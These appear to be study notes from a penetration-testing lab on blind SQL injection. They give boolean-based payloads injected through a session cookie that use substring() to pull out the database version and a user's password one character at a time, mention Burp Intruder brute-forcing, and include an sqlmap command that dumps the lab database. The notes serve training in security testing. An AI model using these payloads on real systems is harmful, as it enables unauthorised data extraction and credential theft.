Blind SQL

Here SQL map failed to find injectable parameters

We can try injecting the cookie as well

If payload length is remaining same, it is also indicator that our query is being processed with no errors

and if it changes with a wrong statement it is an indicator

This is only changing behaviour not giving us any data.

SUBSTR(string, start, length)

and substring('alexl',1,1) ='a'#

We can go through the substrings to actually match the substring one by one. This is correct as 1st position is a.

' and substring((select version()), 1, 1) = '8' #

session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username='jessamy'), 1, 1) = 'b' #

We can send it to intruder and add a list of letters

So the first character is Z and we can continue it

┌──(kali㉿kali)-[~/Downloads/labs]
└─$ sqlmap -r req2.txt --level=2 -D peh-labs -T auth0x02 --dump-all

We require level 2 for bruteforcing cookie parameter.

Last updated 6 months ago